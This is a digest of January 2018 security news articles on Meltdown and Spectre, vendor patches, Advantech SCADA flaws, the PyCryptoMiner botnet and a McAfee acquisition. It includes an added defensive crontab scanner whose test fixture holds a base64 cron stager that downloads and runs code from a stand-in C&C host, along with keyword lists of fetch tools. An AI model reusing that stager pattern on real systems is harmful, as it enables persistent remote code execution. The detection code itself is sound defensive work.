“That’s why it’s crucially important to implement a complex security solution that’s specifically designed to protect automated industrial environments, is highly flexible and configured in accordance with the technological processes of each organisation.”


Inside McAfee's Acquisition of Skyhigh Networks
5.1.2018 securityweek IT
McAfee Completes Acquisition of Skyhigh Networks

On Jan. 3, McAfee completed the acquisition of Skyhigh Networks that was announced in November 2017. McAfee itself was spun out of Intel in April 2017 with the express purpose of becoming one of the world's largest pure play cybersecurity firms. The purchase of Skyhigh, a cloud access security broker (CASB), now allows McAfee to offer an integrated security solution from endpoint across networks and into the cloud.

"Today's news marks a new milestone for the future of our company in cloud," said Chris Young, McAfee's CEO. "With two industry leaders meeting under one company, we will make cybersecurity an enabler to the transformative power of our digital age. We are focused on securing customers from their devices to the cloud."

SecurityWeek talked to McAfee SVP and CTO Steve Grobman to understand the mechanics and purpose of this new, expanded, McAfee. "McAfee's strategy," he said, "is all about security from the device to the cloud, and supporting organizational defense with all the information that comes from both of those places. McAfee currently has a very strong set of technologies on the endpoint, on the devices -- but what the Skyhigh acquisition does is provide a very powerful control point in the cloud for a wide range of cloud security use cases."

He believes there are three exciting aspects to this purchase: being able to offer greater cloud visibility and control under the McAfee umbrella; the improved threat detection that will come from seeing both cloud and on-premise threats in context; and the continuing growth potential of CASBs in their own right.

The Skyhigh solution offers three primary aspects to cloud security: visibility into the cloud; control over interaction with the cloud; and greater awareness of and solutions to the threats inherent in moving into public cloud. "At the highest level," he said, "a big part of the cloud problem is just awareness of what Shadow IT services an organization is using. More often than not, people are not using shadow IT because they are malicious, but rather because they have found a more efficient way for them to get their job done.

"Skyhigh," he continued, "can identify the use of Shadow IT so that an organization can determine whether it's an approved and sanctioned use of cloud capabilities, and take appropriate action." This is useful. Employees can sometimes find a better solution to their work requirements than is currently available from the IT department. Simply banning Shadow IT probably would not work, but would certainly have a negative effect on employee initiative and productivity. Knowing what is being used allows the security team to analyze the risk and determine whether and to what extent a newly used cloud application should be allowed within the enterprise.

The second aspect, he continued, "is about controlling and managing access, content and methodologies for cloud services. That's either through proxies or through native cloud APIs that provide better visibility into the way that users are accessing these services." He gave the example of moving from on-prem Exchange to cloud Office 365, where the organization will need to ensure that sensitive information isn't flowing to places it shouldn't.

"The organization might want to have different policies for what users can do when they access the cloud based on different access scenarios. For example, if employees are using a managed corporate laptop, they might have unrestricted access to O365 where they can download documents with the full versions of Word or Excel. But if they are accessing their account through their personal phone there might be a policy setting that would restrict them to only using the web interface; or requiring that if they download a document, it is wrapped in an enterprise or digital rights management control. Being able to control how the cloud is used makes it possible to minimize risk."

The third element is in identifying and solving the new risks that come with moving to the cloud. "When organizations move to the cloud, they need to be aware of all sorts of new risks that a CASB solution is able to monitor, detect and alert on," he said. He gave AWS S3 misconfigurations as an example. "There have been numerous data breaches recently involving the misconfiguration of access controls in public cloud storage. Users have inadvertently given world read access to an Amazon S3 bucket, giving anyone access to what should be protected data." Examples include the exposure of tens of thousands of potentially sensitive government files disclosed in June 2017; the personal details of 198 million American voters also disclosed in June 2017; and millions of Dow Jones customer details exposed in July 2017.

What really excites Grobman about the Skyhigh acquisition is the ability to combine and integrate visibility into cloud threats with McAfee's existing visibility into on-premise threats.

"A large part of threat detection today is not in identifying a threat from just one event, but understanding threats from multiple events chained together," Grobman said. "In order to do this effectively, you need to have visibility into events from many different sources, including both the cloud and on-prem corporate devices. This is one reason why the Skyhigh acquisition makes a lot of sense for McAfee -- it is the aggregation of looking at the information coming from both the cloud computing element of the organization as well as traditional computing resources. When you put these together you can identify a lot of threats that would be difficult to detect individually."

Now the acquisition is complete, Grobman explained that Skyhigh will largely exist as its own division within McAfee. "Rajiv Gupta, the founder and CEO of Skyhigh, will join McAfee CEO Chris Young's staff and drive the product line as its own business unit. There are a few exceptions related to back office functions, like finance and HR," he added, "but for the most part, the initial approach is for Skyhigh to be its own business unit."

The definitive roadmap for things like branding are still being investigated. For the moment, the official McAfee announcement describes Skyhigh as "now part of the new cloud security business unit, led by Rajiv Gupta, former Skyhigh Networks chief executive officer."

"What we're concentrating on," said Grobman, "is really building on the synergies that Skyhigh will bring to our environment; taking McAfee's world class protection technology and integrating that into Skyhigh -- being able to look at event data from both cloud sources and traditional computing and have those work together in order to give our customers a better ability to detect threats within their infrastructure. So although the Skyhigh business will be a separate business unit within McAfee, there will be lots of work to maximize the value of the solution the system can bring to both existing and new customers."

And that, of course, is another offering from the acquisition. The CASB market is still a rapidly growing and emerging area. "There are still many customers that have yet to deploy a CASB solution," said Grobman. "We are very much looking forward to the opportunity to present this technology solution -- especially in the context of McAfee's other technology -- to organizations that are not yet McAfee customers."


Industry Reactions to Meltdown, Spectre Attacks: Feedback Friday
5.1.2018 securityweek
Attack
Researchers disclosed this week the details of two new attack methods allowing malicious actors to gain access to sensitive information stored in a device’s memory by exploiting security holes in Intel, AMD and ARM processors.

The attacks, known as Spectre and Meltdown, have already been addressed by several vendors, including Microsoft, Apple and Google, and Intel and others are also working on rolling out patches.

Billions of PCs, mobile devices and cloud instances are vulnerable to attacks leveraging the Spectre and Meltdown vulnerabilities, and some fear we will soon witness remote exploitation attempts.

Experts comment on the Meltdown and Spectre vulnerabilities

Industry professionals have commented on various aspects of Meltdown and Spectre, including their impact, what users and organizations need to do, and the lessons that can be learned.

And the feedback begins…

Sam Curry, Chief Security Officer, Cybereason:

“The recent revelation of a major chip design security flaw is quite technical and gets to the underlying architecture and interface of physical memory and virtual memory, which is a big part of all practical, modern computing. It’s important to note that no one is immune by default to this chip design flaw and that it may impact a wider set of chips and manufacturers over time. In trying to find ways of improving overall security in memory management, researchers have uncovered a very long running set of flaws that could mean the ability to exploit a lot of systems very deeply.

This is so fundamental that it’s likely they knew about the flaw, so it’s going to be important to watch how they handle the situation and how the narrative and history unfold. The chip vendors are playing this calmly, but this is likely the calm before the storm. It's too early to point fingers yet, but eyes are on the entire chip industry now. Also in spite of the early attention on Intel, this class of threats affects other chip sets. Now is the time for everyone in the chip game to take care of their own business. No excuses.”

Michael Daly, CTO, Cybersecurity & Special Missions, Raytheon:

“The Intel vulnerability reinforces the need for everyone to stay on top of the latest patches. We learned that hard lesson with the Wannacry attack that quickly spread to 150 countries.

In this case, the most immediate and significant risk exists in the cloud services provider environments and in private data centers. The threat seems to be the grabbing of passwords/hash-values and encryption keys from memory and then using these to install additional malware.

Until these systems can all be patched, it will be even more important to watch for unauthorized processes (applications) and other evidence of tampering, such as increased processor usage and file drops. When the patches are issued, their deployment should be prioritized because criminals and nation-state adversaries apparently have had a couple of months head start.”

Ryan Kalember, SVP, Cybersecurity Strategy, Proofpoint:

“Like most organizations, chip manufacturers have long prioritized speed over security—and that has led to a tremendous amount of sensitive data placed at risk of unauthorized access via Meltdown and Spectre. While the vast majority of computing devices are impacted by these flaws, the sky is not falling. Both vulnerabilities require an attacker to be able to run their code on the device they are attacking. The typical consumer is still vastly more likely to be targeted by something like a phishing email than a targeted attack exploiting Meltdown or Spectre. However, these vulnerabilities break down some of the most fundamental barriers computers use to keep data safe, so cloud providers need to act quickly to ensure that unauthorized access, which would be very difficult to detect, does not occur.

If there is some good news, it’s fortunate that these vulnerabilities were discovered and responsibly disclosed by respected researchers as opposed to being exploited in a large scale, potentially-damaging global attack.”

Bryce Boland, Asia Pacific Chief Technology Officer, FireEye:

“Vulnerabilities like this are extremely problematic because they permeate so much of the technology around us that we all rely upon. Resolving this issue will take time and incur costs. In many cases, this cost includes security risks, rectification effort and even computing performance.

These vulnerabilities can have big implications. Many services can be exposed and affected. Hardware vendors will address the underlying design issue, though vulnerable systems will likely remain in operation for decades. In the meantime, software vendors are releasing patches to prevent attackers from exploiting these vulnerabilities. This will also impact system performance which may have a cumulative effect in data centers for anyone using cloud services and the internet.

Large organizations will need to make a risk management decision as to how quickly they update their systems, as this can be disruptive and costly.

We are yet to understand the full impact of this development, and not all details are available. At this stage, exploitable code is not publicly available. Nation state hackers typically use these types of vulnerabilities to develop new attack tools, and that's likely in this case.”

Christian Vezina, Chief Information Security Officer, VASCO Data Security:

“What I find interesting is that with the ever increasing amount of software code out there, security researchers are still discovering 20+ year old vulnerabilities. Unfortunately the processor level vulnerabilities that have been published recently seem to indicate a trend: Everyone drop what you are doing and start patching your systems [again].”

Ben Carr, Vice President of Strategy, Cyberbit:

“Vulnerabilities like Meltdown only highlight the breadth of the potential issue we face no matter the investment. Meltdown potentially affects Intel processors going back to 1995. While many are rushing to find a fix after the disclosure, one must admit that this is why nation state actors don’t really have to try that hard to find a way in. At its core, it just isn’t that difficult.

In the cybersecurity industry, we must realize that we have maxed out on our ability to lock down systems and networks. It has become critical that we look to ways not only to prevent but to defend.”

Michael Lines, VP of strategy, risk and compliance, Optiv:

“The Meltdown and Spectre security flaws are affecting billions of devices, but the fundamental challenges that organizations face remain the same as every other major vulnerability that has been announced. Fixing these security flaws is going to be a long-term issue to resolve because, one, patches are needed across a vast array of operating systems, and two, patches for Spectre are still to be developed and released.

These widespread vulnerabilities underscore the importance of having ongoing risk assessment processes in place, as well as well-oiled TVM processes – both as part of a robust information security program. Risk assessment should cover both awareness and management of the issue at the board and C-suite level. These flaws are going to bring a lot of ‘doom and gloom,’ but organizations’ ability to react in an efficient and predictable way is what is most critical. Don’t panic, prepare a rational plan based on patch availability and system sensitivity, execute your plan, and monitor progress.”

Prof. Yehuda Lindell, chief scientist and co-founder, Dyadic:

“The important take-away from these attacks is very simple - computation leaks secrets! There has been a huge body of work showing that secret cryptographic keys and private information can be stolen by running software on the same machine and utilizing the properties of modern complex processors that don’t provide true separation between processes. In the past it has been shown how the machine's cache and even clock can be used by one process to steal secrets from another. Meltdown and Spectre go a step further by utilizing the way that modern processors achieve speedups through something called “speculative execution”.

As a result, if you are computing on private information or carrying out cryptographic operations on a machine, and an attacker can run code on the same machine, then you are not safe. This includes the case that an attacker breaches your network, but is primarily of relevance in cloud environments where by definition different customers run their applications on the same machine.”

Jeff Tang, Senior Security Researcher, Cylance:

“The biggest impact is for companies relying on shared computing resources in the cloud - such as virtual private servers, virtual machines, and containers - which place them at higher risk of an attacker employing these new techniques to extract secrets (passwords, encryption keys, and other sensitive data). Administrators should check with their hosting provider to determine the appropriate steps to deploy mitigations which may include applying software updates and rebooting the virtual machine.

Administrators should prioritize patch testing and validation of the newly released Microsoft security update and deploy it to shared workstations and hypervisor based systems, which are at higher risk of being targeted by attackers hoping to maximize their impact.”

Joseph Carson, Chief Security Scientist, Thycotic:

“The latest Intel, ARM and AMD chip security flaw is a major issue for multiple reasons; the security risk has the potential for simple code running in a web browser. This could allow for a cybercriminal to access sensitive data in protected memory which could include passwords, login keys or sensitive data that is typically protected. The patch of such a flaw is a major challenge as a firmware update typically requires a reboot, so for servers running critical systems this results in unplanned downtime. With the fix having a potential performance impact of up to 30%, this means critical systems already running at full power could require costly upgrades to ensure operational stability.

With these cyber risks, it means that most companies will approach patching systems with extreme caution as many companies still prioritise business operations over security issues. The impact for many companies not having the systems operational is sometimes greater than the risk of a cyberattack but cyberattacks do not come cheap either as seen with cyberattacks like WannaCry and NotPetya in 2017 costing some companies up to 300 million USD. The systems at higher risk are those that are internet connected, meaning they are easily accessible by cybercriminals and those systems used by employees, who regularly use them for browsing the internet, so these systems should be the priority for any organisation that takes cybersecurity seriously.”


Ubuntu Preps Patches for Meltdown, Spectre CPU Flaws
5.1.2018 securityweek
Vulnerability
Ubuntu security updates planned for January 9 will patch the recently disclosed Meltdown and Spectre CPU vulnerabilities, Canonical has announced.

Impacting billions of devices around the world, Meltdown and Spectre are two new side-channel attacks targeting CPUs from Intel, AMD and ARM. Residing in the CPU architecture, the flaws impact Windows, MacOS, Linux, and many other operating systems.

The attacks abuse three different flaws and can be leveraged to bypass memory isolation and access sensitive data such as passwords, photos, documents, and emails.

Experts are warning of the risk of remote exploitation of Spectre vulnerabilities in targeted or mass attacks and tech companies such as Microsoft, Google, Apple, and others have already revealed plans to address the issues in their products.

On Thursday, Intel announced patches for its CPUs, saying it would address the bugs in 90% of the CPUs produced over the past five years.

Intel is said to have been aware of the vulnerabilities since April 2017, and other companies were informed on the matter a while ago as well, including Canonical, which has been working on fixes for the past couple of months.

According to the company, “essentially every operating system, hardware, and cloud vendor in the world” agreed to a coordinated release date of January 9, 2018, but the news on Meltdown and Spectre broke earlier. However, patches for Ubuntu won’t be available until the planned release date.

“By design, operating system updates would be available at the same time as the public disclosure of the security vulnerability. While it happens rarely, this is an industry standard best practice, which has broken down in this case,” Canonical explains.

Ubuntu 64-bit x86 (aka, amd64) should receive updated kernels by Jan 9, or sooner if possible. The updates will be released for Ubuntu 17.10 (Artful) — Linux 4.13 HWE; Ubuntu 16.04 LTS (Xenial) — Linux 4.4 (and 4.4 HWE); Ubuntu 14.04 LTS (Trusty) — Linux 3.13; and Ubuntu 12.04 ESM (Precise) — Linux 3.2 (an Ubuntu Advantage license is required for the 12.04 ESM kernel update).

In April, Ubuntu 18.04 LTS (Bionic) will ship with a 4.15 kernel, which includes the KPTI patchset as integrated upstream, the company says.

“Ubuntu optimized kernels for the Amazon, Google, and Microsoft public clouds are also covered by these updates, as well as the rest of Canonical’s Certified Public Clouds including Oracle, OVH, Rackspace, IBM Cloud, Joyent, and Dimension Data,” Canonical explains.

The company also warns that a reboot will be required to activate the update, as the kernel fixes are not Livepatch-able. The update includes “hundreds of independent patches, touching hundreds of files and thousands of lines of code,” and the complexity of the patchset is not compatible with the Linux kernel Livepatch mechanism.


Several Vulnerabilities Patched in Advantech WebAccess
5.1.2018 securityweek
Vulnerability
Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address several vulnerabilities, including ones rated high severity.

Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. According to ICS-CERT, the product is used in the United States, Europe and East Asia in sectors such as critical manufacturing, energy, and water and wastewater.

Researchers have once again found several vulnerabilities in this HMI/SCADA product. One of the most serious, based on its CVSS score of 8.2, is CVE-2017-16724, which has been described as a stack-based buffer overflow. These types of security holes typically allow an attacker to crash the application and possibly even execute arbitrary code.

The identifier CVE-2017-16728 has been assigned to several untrusted pointer dereference vulnerabilities that can be exploited to cause the application to crash.

Experts also identified a path traversal flaw that can be exploited to access files on the targeted device (CVE-2017-16720), and a SQL injection vulnerability caused by the lack of proper sanitization of user input (CVE-2017-16716).

The least serious weakness, classified as medium severity, allows an attacker to crash the application using specially crafted inputs.

The vulnerabilities have been patched by Advantech with the release of WebAccess 8.3. The vendor says all prior versions are affected.

A report published last year by Trend Micro’s Zero Day Initiative (ZDI) showed that it had taken Advantech, on average, 131 days to patch vulnerabilities, which was significantly better than the record of many other major ICS vendors. ZDI published more than 50 advisories for Advantech vulnerabilities in 2017, roughly half the number published in the previous year.

Several of the flaws were reported through ZDI by researchers Steven Seeley, Zhou Yu and Andrea Micalizzi. ZDI has prepared advisories for the vulnerabilities, but it has yet to make them public. The list of experts credited by ICS-CERT for finding the flaws also includes Michael Deplante.

Seeley was also credited for finding two remote code execution vulnerabilities in Advantech WebAccess in November.


PyCryptoMiner botnet, a new Crypto-Miner Botnet spreads over SSH
5.1.2017 securityaffairs BotNet

Security experts at F5 discovered a new Linux Monero crypto-miner botnet dubbed PyCryptoMiner spreading over the SSH protocol.
F5 researchers discovered a new Linux crypto-miner botnet dubbed PyCryptoMiner spreading over the SSH protocol. The Monero miner botnet is written in the Python scripting language, and it falls back to Pastebin as command and control (C&C) infrastructure when the original C&C server isn’t available.

If all C&C servers of the botnet are not accessible, all newly infected bots are idle, polling for the botmaster’s Pastebin page.

The experts believe the botnet is still under development: its operators have recently added scanner functionality hunting for vulnerable JBoss servers (exploiting CVE-2017-12149).

It has been estimated that the PyCryptoMiner botnet has generated the equivalent of approximately $46,000 as of late December.

The experts believe the PyCryptoMiner botnet is more evasive because it is written in a scripting language: it is hard to detect because the malicious code is executed by a legitimate interpreter binary.

The malware spreads by attempting to guess the SSH login credentials of target Linux systems. Once SSH credentials are guessed, the bot deploys a simple base64-encoded Python script designed to connect to the C&C server to download and execute additional Python code.

The second-stage code is the controller that registers a cron job on the infected machine to gain persistence.

The original script checks whether the machine has already been infected, and it also collects information on the infected device, including:

Host/DNS name
OS name and its architecture
Number of CPUs
CPU usage
The bot sends a report with the collected information to the C&C, which in turn sends it task details. The “task” includes:

“cmd” — arbitrary command to be executed as a separate process
“client_version” — if the version number received from the server is different from the current bot version, it will terminate the bot and wait for the cron to run the spearhead script again to deploy an updated version (current value is “4”)
“task_hash” — task identifier so the C&C can synchronize botnet results, because each command has a different execution time
“conn_cycler” — time interval to poll the C&C, which is controlled by the bot master, probably to balance the loads on its C&C infrastructure as the botnet grows (default value 15 seconds)
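The persistence mechanism described above (a cron job that re-runs a base64-encoded Python stager, which then fetches further code from the C&C) leaves a recognisable trace in crontabs. The following defender-side check is an added example, not code from the F5 report or from the botnet itself: it parses crontab text, flags entries that invoke an interpreter with inline code, decode base64 on the command line, and whose decoded payload fetches remote content or calls exec(). The crontab lines, the stager source and the C&C URL are constructed for this example and are not indicators from the report.

```python
import base64
import re

# Constructed sample: the suspicious entry mimics the reported pattern of a
# cron job re-running a base64-encoded Python stager. The stager source, the
# URL and the schedule are made up for this example, not IoCs from the report.
STAGER_SRC = b"import urllib2;exec(urllib2.urlopen('http://c2.example.invalid/stage2.py').read())"
STAGER_B64 = base64.b64encode(STAGER_SRC).decode("ascii")

SAMPLE_CRONTAB = (
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/bin/apt-get update\n"
    f"*/15 * * * * python -c \"import base64;exec(base64.b64decode('{STAGER_B64}'))\"\n"
    "30 2 * * 0 /opt/backup/run.sh\n"
)

# Interpreter invoked with inline code (python -c, perl -e, sh -c, ...).
INTERPRETER_RE = re.compile(r"\b(python[0-9.]*|perl|ruby|sh|bash)\b\s+(-c|-e)\b")
# Runs of base64 alphabet long enough to hold a script rather than a token.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
FETCH_KEYWORDS = ("urlopen", "urllib", "requests.", "socket", "wget", "curl")


def decode_blob(blob):
    """Strictly decode a base64 candidate; return printable text or None."""
    try:
        raw = base64.b64decode(blob, validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_command(cmd):
    """Return (reasons, decoded payloads) for one crontab command string."""
    reasons, decoded = [], []
    if INTERPRETER_RE.search(cmd):
        reasons.append("interpreter invoked with inline code (-c/-e)")
    if "b64decode" in cmd or "base64" in cmd:
        reasons.append("base64 decoding on the command line")
    for blob in B64_RE.findall(cmd):
        text = decode_blob(blob)
        if text is None:
            continue
        decoded.append(text)
        if any(k in text for k in FETCH_KEYWORDS):
            reasons.append("decoded payload fetches remote content")
        if "exec(" in text:
            reasons.append("decoded payload calls exec()")
    return reasons, decoded


def scan_crontab(text):
    """Scan crontab text; report entries that match two or more heuristics."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split(None, 5)  # min hour dom mon dow command
        if len(fields) < 6:
            continue  # not a schedule line we can parse (e.g. VAR=value)
        reasons, decoded = scan_command(fields[5])
        if len(reasons) >= 2:
            findings.append({"line": lineno, "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {'; '.join(f['reasons'])}")
        for payload in f["decoded"]:
            print("  decoded:", payload)
```

Requiring two independent heuristics keeps legitimate one-liners (a backup script that happens to base64-encode output, say) below the alert threshold, while a stager that both decodes and then fetches and executes code trips several at once. The same function can be pointed at `/etc/cron.d/*` or at per-user crontabs collected from a fleet.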
The PyCryptoMiner botnet uses two pool addresses that show approximately 94 and 64 Monero, with a value of around $60,000. However, it is not possible to know overall profits of the botnet.

The analysis of the Pastebin page used as the alternative C&C revealed the botnet might have been active since August 2017, and that the content had been viewed 177,987 times at the time of the investigation. It is not possible to determine the overall size of the botnet from this figure, because each bot may visit the page repeatedly whenever the C&C server is down.

The botmaster used the moniker “WHATHAPPEN” which is associated with more than 36,000 domains and 235 email addresses. The registrant has been involved in scams, gambling, and adult services since 2012.

Below are F5’s key findings on the PyCryptoMiner botnet:

Is based on the Python scripting language making it hard to detect
Leverages Pastebin.com (under the username “WHATHAPPEN”) to receive new command and control server (C&C) assignments if the original server becomes unreachable
The registrant is associated with more than 36,000 domains, some of which have been known for scams, gambling, and adult services since 2012
Is mining Monero, a highly anonymous crypto-currency favored by cyber-criminals. As of late December 2017, this botnet has made approximately US $46,000 mining Monero
New scanner functionality hunting for vulnerable JBoss servers was introduced mid-December exploiting CVE-2017-12149
F5 also published IoCs for the botnet.


[Guide] How to Protect Your Devices Against Meltdown and Spectre Attacks
5.1.2017 thehackernews 
Attack


Two recently uncovered processor vulnerabilities, Meltdown and Spectre, have taken the whole world by storm, and vendors are rushing to patch them in their products.
The issues apply to all modern processors and affect nearly all operating systems (Windows, Linux, Android, iOS, macOS, FreeBSD, and more), smartphones and other computing devices made in the past 20 years.
What are Spectre and Meltdown?
We explained the Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753, CVE-2017-5715) exploitation techniques in our previous article.
In short, Spectre and Meltdown are the names of security vulnerabilities found in many processors from Intel, ARM and AMD that could allow attackers to steal your passwords, encryption keys and other private information.
Both attacks abuse 'speculative execution' to access privileged memory—including those allocated for the kernel—from a low privileged user process like a malicious app running on a device, allowing attackers to steal passwords, login keys, and other valuable information.
Protect Against Meltdown and Spectre CPU Flaws
Some, including US-CERT, have suggested the only true patch for these issues is for chips to be replaced, but this solution seems to be impractical for the general user and most companies.
Vendors have made significant progress in rolling out fixes and firmware updates. While the Meltdown flaw has already been patched by most companies like Microsoft, Apple and Google, Spectre is not easy to patch and will haunt people for quite some time.
Here's the list of available patches from major tech manufacturers:
Windows OS (7/8/10) and Microsoft Edge/IE
Microsoft has already released an out-of-band security update (KB4056892) for Windows 10 to address the Meltdown issue and will be releasing patches for Windows 7 and Windows 8 on January 9th.
But if you are running third-party antivirus software, it is possible your system won’t install the patch automatically. So, if you are having trouble installing the automatic security update, turn off your antivirus and use Windows Defender or Microsoft Security Essentials.
"The compatibility issue is caused when antivirus applications make unsupported calls into Windows kernel memory," Microsoft noted in a blog post. "These calls may cause stop errors (also known as blue screen errors) that make the device unable to boot."
Apple macOS, iOS, tvOS, and Safari Browser
Apple noted in its advisory, "All Mac systems and iOS devices are affected, but there are no known exploits impacting customers at this time."
To help defend against the Meltdown attacks, Apple has already released mitigations in iOS 11.2, macOS 10.13.2, and tvOS 11.2, and plans to release mitigations in Safari to help defend against Spectre in the coming days.
Android OS
Android users running the most recent version of the mobile operating system released on January 5 as part of the Android January security patch update are protected, according to Google.
So, if you own a Google-branded phone, like Nexus or Pixel, your phone will either automatically download the update, or you'll simply need to install it. However, other Android users have to wait for their device manufacturers to release a compatible security update.
The tech giant also noted that it's unaware of any successful exploitation of either Meltdown or Spectre on ARM-based Android devices.
Firefox Web Browser
Mozilla has released Firefox version 57.0.4 which includes mitigations for both Meltdown and Spectre timing attacks. So users are advised to update their installations as soon as possible.
"Since this new class of attacks involves measuring precise time intervals, as a partial, short-term mitigation we are disabling or reducing the precision of several time sources in Firefox," Mozilla software engineer Luke Wagner wrote in a blog post.
Google Chrome Web Browser
Google has scheduled the patches for Meltdown and Spectre exploits on January 23 with the release of Chrome 64, which will include mitigations to protect your desktop and smartphone from web-based attacks.
In the meantime, users can enable an experimental feature called "Site Isolation" that can offer some protection against the web-based exploits but might also cause performance problems.
"Site Isolation makes it harder for untrusted websites to access or steal information from your accounts on other websites. Websites typically cannot access each other's data inside the browser, thanks to code that enforces the Same Origin Policy." Google says.
Here's how to turn on Site Isolation:
Copy chrome://flags/#enable-site-per-process and paste it into the URL field at the top of your Chrome web browser, and then hit the Enter key.
Look for Strict Site Isolation, then click the box labelled Enable.
Once done, hit Relaunch Now to relaunch your Chrome browser.
Linux Distributions
The Linux kernel developers have also released patched kernel versions, including 4.14.11, 4.9.74, 4.4.109, 3.16.52, 3.18.91 and 3.2.97, which can be downloaded from Kernel.org.
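A small check an administrator can run against that list, added here as an example (it is not code from the article, from Kernel.org or from any distribution): it parses the running kernel's release string and compares it with the patched stable releases named above, treating 4.15 and later as carrying KPTI upstream, as Canonical notes for Ubuntu 18.04 in the earlier article. The sysfs path it also consults is an assumption not mentioned in the article: kernels that carry the mitigation code report their own status there, which matters because distribution kernels backport fixes without changing the upstream version number, so the version comparison alone is only meaningful for vanilla kernel.org kernels.

```python
import os
import platform
import re

# Minimum kernel.org stable releases carrying the Meltdown (KPTI) fixes, as
# listed in the article, keyed by stable series.
PATCHED_KERNELS = {
    (4, 14): (4, 14, 11),
    (4, 9): (4, 9, 74),
    (4, 4): (4, 4, 109),
    (3, 18): (3, 18, 91),
    (3, 16): (3, 16, 52),
    (3, 2): (3, 2, 97),
}
# 4.15 and later merged KPTI upstream (per Canonical's note on Ubuntu 18.04).
FIRST_SERIES_WITH_KPTI_UPSTREAM = (4, 15)

# Assumed sysfs path (not mentioned in the article): kernels carrying the
# mitigation code, including stable backports, report their status here.
SYSFS_MELTDOWN = "/sys/devices/system/cpu/vulnerabilities/meltdown"


def parse_release(release):
    """Turn 'X.Y.Z-anything' into (X, Y, Z); a missing patch level counts as 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def kpti_status(release):
    """Classify a vanilla kernel.org release string by version number alone.

    Returns 'patched', 'vulnerable' or 'unknown' (series not in the list,
    e.g. an end-of-life series that received no fix).
    """
    version = parse_release(release)
    series = version[:2]
    if series >= FIRST_SERIES_WITH_KPTI_UPSTREAM:
        return "patched"
    minimum = PATCHED_KERNELS.get(series)
    if minimum is None:
        return "unknown"
    return "patched" if version >= minimum else "vulnerable"


def sysfs_meltdown_status(path=SYSFS_MELTDOWN):
    """Return the kernel's own Meltdown mitigation string, or None if absent."""
    if not os.path.exists(path):
        return None
    with open(path) as fh:
        return fh.read().strip()


def report(release=None):
    """Prefer the kernel's own answer; fall back to the version comparison."""
    release = release or platform.release()
    sysfs = sysfs_meltdown_status()
    if sysfs is not None:
        return f"{release}: kernel reports '{sysfs}'"
    return f"{release}: no sysfs status; version check says {kpti_status(release)}"


if __name__ == "__main__":
    print(report())
```

A result of "unknown" is a prompt to check the distribution's own advisory rather than a clean bill of health, and "vulnerable" from the version check on a distribution kernel may simply mean the fix was backported under an unchanged version string.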
VMware and Citrix
A global leader in cloud computing and virtualisation, VMware, has also released a list of its products affected by the two attacks and security updates for its ESXi, Workstation and Fusion products to patch against Meltdown attacks.
On the other hand, another popular cloud computing and virtualisation vendor Citrix did not release any security patches to address the issue. Instead, the company guided its customers and recommended them to check for any update on relevant third-party software.


Intel Patches CPUs Against Meltdown, Spectre Exploits
5.1.2018 securityweek
Exploit
Intel has been working with its partners to release software and firmware updates that should protect systems against the recently disclosed CPU attacks. The company expects patches to become available for a majority of its newer products by the end of next week.

Researchers this week disclosed the details of Spectre and Meltdown, two new side-channel attacks targeting CPUs from Intel, AMD and ARM. The attacks, which leverage three different flaws, can be used to bypass memory isolation mechanisms and gain access to sensitive data, including passwords, photos, documents, and emails. Experts have warned that malicious actors may soon start to remotely exploit the Spectre vulnerabilities in targeted or mass attacks.

AMD has insisted that there is a “near zero risk” to its customers and ARM says only a few of its Cortex processors are impacted.

Intel informed customers on Thursday that system manufacturers have been provided firmware and software updates that address Spectre and Meltdown for processors launched in the last five years – experts believe nearly every Intel processor made since 1995 is impacted. It will now be up to system manufacturers to distribute the patches.

“By the end of next week, Intel expects to have issued updates for more than 90 percent of processor products introduced within the past five years,” Intel said.

In response to concerns that mitigations for the Spectre and Meltdown vulnerabilities can introduce performance penalties of as much as 30 percent, Intel pointed out that average users will not notice any difference.

“While on some discrete workloads the performance impact from the software updates may initially be higher, additional post-deployment identification, testing and improvement of the software updates should mitigate that impact,” Intel said.

The company cited Apple, Microsoft, Amazon and Google, all of which said the mitigations did not create any noticeable performance issues.

The best protection against these attacks is the use of kernel page table isolation (KPTI), a hardening technique designed by a team of researchers at the Graz University of Technology in Austria to isolate kernel space from user space memory. Google, whose researchers independently found the flaws, also developed a novel mitigation named Retpoline.

Microsoft, Apple, Google, Red Hat, VMware and other major tech firms have already started releasing software updates and workarounds to resolve the vulnerabilities.

Intel was hit the hardest by Spectre and Meltdown and the company’s stock lost 6 percent in value shortly after the disclosure. The company’s CEO, Brian Krzanich, sold all the stock he was legally allowed to, worth roughly $24 million, just before the news broke, which has raised insider trading concerns. Intel claims Krzanich had been planning on selling stock for months, but Intel has reportedly known about the vulnerabilities since April 2017.


Google Apps Script Allowed Hackers to Automate Malware Downloads
5.1.2018 securityweek
Virus
Researchers at Proofpoint discovered recently that Google Apps Script could have been abused by malicious hackers to automatically download malware hosted on Google Drive to targeted devices.

Google Apps Script is a JavaScript-based scripting language that allows developers to build web applications and automate tasks. Experts noticed that the service could have been leveraged to deliver malware by using simple triggers, such as onOpen or onEdit.

In an attack scenario described by Proofpoint, attackers uploaded a piece of malware to Google Drive and created a public link to it. They then used Google Docs to send the link to the targeted users. Once victims attempted to edit the Google Docs file, the Apps Script triggers would cause the malware to be automatically downloaded to their devices. Researchers said attackers could have used social engineering to convince the target to execute the malware.

Google has implemented new restrictions for simple triggers in an effort to block malware and phishing attacks triggered by opening a document.

While there is no evidence that this method has been exploited in the wild, malicious actors abusing Google Apps Script is not unheard of. A cybercrime group using the infamous Carbanak malware at one point leveraged the service for command and control (C&C) communications.

